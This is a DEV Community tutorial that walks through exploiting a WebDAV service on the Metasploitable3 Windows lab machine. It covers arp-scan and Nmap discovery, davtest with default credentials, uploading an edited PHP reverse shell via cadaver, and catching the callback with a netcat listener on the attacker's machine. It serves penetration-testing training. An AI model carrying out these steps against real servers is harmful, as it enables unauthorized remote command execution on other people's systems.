DEV Community

Cover image for Reverse Shell on MetaSploitable3 Windows
ANDGOEDU
ANDGOEDU

Posted on

2

Reverse Shell on MetaSploitable3 Windows

In-Depth Steps for WebDAV Exploitation

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.

Information Gathering

Step 0: Check Router IP from eth0 on your Kali Machine

ip addr
Enter fullscreen mode Exit fullscreen mode

Example Results:

inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
Enter fullscreen mode Exit fullscreen mode

Step 1: Quick arp-scan

arp-scan 192.168.1.1/24
Enter fullscreen mode Exit fullscreen mode

Example Results:

192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH
Enter fullscreen mode Exit fullscreen mode

Step 2: Nmap Scan for All Ports and OS Detection

nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt
Enter fullscreen mode Exit fullscreen mode

Example Results:

Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1

// Also the open port 8585 for the WebDav 
PORT     STATE SERVICE REASON         VERSION
8585/tcp open  unknown syn-ack ttl 64
Enter fullscreen mode Exit fullscreen mode

Nmap scan report for 192.168.1.11:

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:
Enter fullscreen mode Exit fullscreen mode

Step 3: Davtest for WebDAV

davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads
Enter fullscreen mode Exit fullscreen mode

Example Results:

Testing DAV connection
OPEN            SUCCEED:                http://192.168.1.11:8585/uploads
Enter fullscreen mode Exit fullscreen mode

WebDAV Exploitation

Step 4: Copy PHP Reverse Shell to Desktop

cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
Enter fullscreen mode Exit fullscreen mode

Step 5: Edit PHP Reverse Shell

Edit /home/kali/Desktop/php-reverse-shell.php:

$ip = '192.168.1.10';  // Kali machine IP
$port = 7779;           // TCP/UDP Port
$shell = 'cmd.exe';     // Use cmd.exe for Windows
Enter fullscreen mode Exit fullscreen mode

Step 6: Start Netcat Listener on Kali

nc -lvnp 7779
Enter fullscreen mode Exit fullscreen mode

Step 7: Upload PHP Reverse Shell Using Cadaver

cadaver http://192.168.1.11:8585/uploads
dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php
Enter fullscreen mode Exit fullscreen mode

Step 8: Check Netcat Listener for Shell

nc -lnvp 7779
Enter fullscreen mode Exit fullscreen mode

Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.

Explanation:

  1. Information Gathering:

    • Step 0: Check the router IP to identify the local network's subnet.
    • Step 1: Use arp-scan to discover active hosts on the network.
    • Step 2: Perform an Nmap scan to find open ports and detect the operating system.
  2. WebDAV Exploitation:

    • Step 3: Use davtest to verify that the WebDAV service is accessible.
    • Step 4: Copy a PHP reverse shell script to the attacker's machine.
    • Step 5: Edit the PHP script with the attacker's IP and desired port.
    • Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
    • Step 7: Upload the modified PHP script to the target using Cadaver.
    • Step 8: Check the Netcat listener for a successful reverse shell.

Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

Top comments (0)

Heroku

Build apps, not infrastructure.

Dealing with servers, hardware, and infrastructure can take up your valuable time. Discover the benefits of Heroku, the PaaS of choice for developers since 2007.

Visit Site

πŸ‘‹ Kindness is contagious

Engage with a sea of insights in this enlightening article, highly esteemed within the encouraging DEV Community. Programmers of every skill level are invited to participate and enrich our shared knowledge.

A simple "thank you" can uplift someone's spirits. Express your appreciation in the comments section!

On DEV, sharing knowledge smooths our journey and strengthens our community bonds. Found this useful? A brief thank you to the author can mean a lot.

Okay